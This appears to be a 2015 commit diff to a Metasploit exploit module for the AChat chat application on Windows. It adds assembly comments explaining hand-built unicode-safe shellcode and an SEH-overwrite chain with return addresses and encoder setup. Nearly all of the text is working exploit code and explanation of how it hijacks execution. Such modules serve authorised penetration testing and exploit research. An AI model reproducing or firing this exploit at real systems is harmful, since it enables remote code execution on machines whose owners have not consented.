hex strings related explanations

earthquake · earthquake · commit c7880ab4e15f · 2015-02-09T23:21:38.000+01:00
diff --git a/modules/exploits/windows/misc/achat_beta.rb b/modules/exploits/windows/misc/achat_beta.rb
@@ -67,6 +67,22 @@ def initialize(info = {})
   def exploit
     connect_udp
 
+    # 0055 00          ADD BYTE PTR SS:[EBP],DL # padding
+    # 2A00             SUB AL,BYTE PTR DS:[EAX] # padding
+    # 55               PUSH EBP                 # ebp holds a close pointer to the payload
+    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
+    # 58               POP EAX                  # mov eax, ebp
+    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
+    # 05 00140011      ADD EAX,11001400         # adjusting eax
+    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
+    # 2D 00130011      SUB EAX,11001300         # lea eax, eax+100
+    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
+    # 50               PUSH EAX                 # eax points to the start of the shellcode
+    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
+    # 58               POP EAX                  # padding
+    # 0043 00          ADD BYTE PTR DS:[EBX],AL # padding
+    # 59               POP ECX                  # padding
+    # 0039             ADD BYTE PTR DS:[ECX],BH # padding
     firststage = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
     encoder = framework.encoders.create('x86/unicode_mixed')
     encoder.datastore.import_options_from_hash({ 'BufferRegister' => 'EAX' })
@@ -78,7 +94,26 @@ def exploit
     sploit << "\x61\x40" # POPAD + INC EAX
 
     sploit << target.ret # AChat.exe p/p/r address
+
     # adjusting the first thread's unicode payload, tricky asm-fu
+    # the first seh exception jumps here, firststage variable will be executed
+    # by the second seh exception as well. It needs to be in sync with the second
+    # thread, so that is why we adjust eax/ebp to have a close pointer to the
+    # payload, then firststage variable will take the rest of the job.
+    # 0043 00          ADD BYTE PTR DS:[EBX],AL # padding
+    # 55               PUSH EBP                 # ebp with close pointer to payload
+    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
+    # 58               POP EAX                  # put ebp to eax
+    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
+    # 2A00             SUB AL,BYTE PTR DS:[EAX] # setting eax to the right place
+    # 2A00             SUB AL,BYTE PTR DS:[EAX] # adjusting eax a little bit more
+    # 05 00140011      ADD EAX,11001400         # more adjusting
+    # 0043 00          ADD BYTE PTR DS:[EBX],AL # padding
+    # 2D 00130011      SUB EAX,11001300         # lea eax, eax+100
+    # 0043 00          ADD BYTE PTR DS:[EBX],AL # padding
+    # 50               PUSH EAX			# saving eax
+    # 0043 00          ADD BYTE PTR DS:[EBX],AL # padding
+    # 5D               POP EBP			# mov ebp, eax
     sploit << "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43"
     sploit << "\x61\x43" + target.ret # second nseh entry, for the second thread
     sploit << "\x2A" + firststage + "C"*(157-firststage.length-31-3) # put address of the payload to EAX
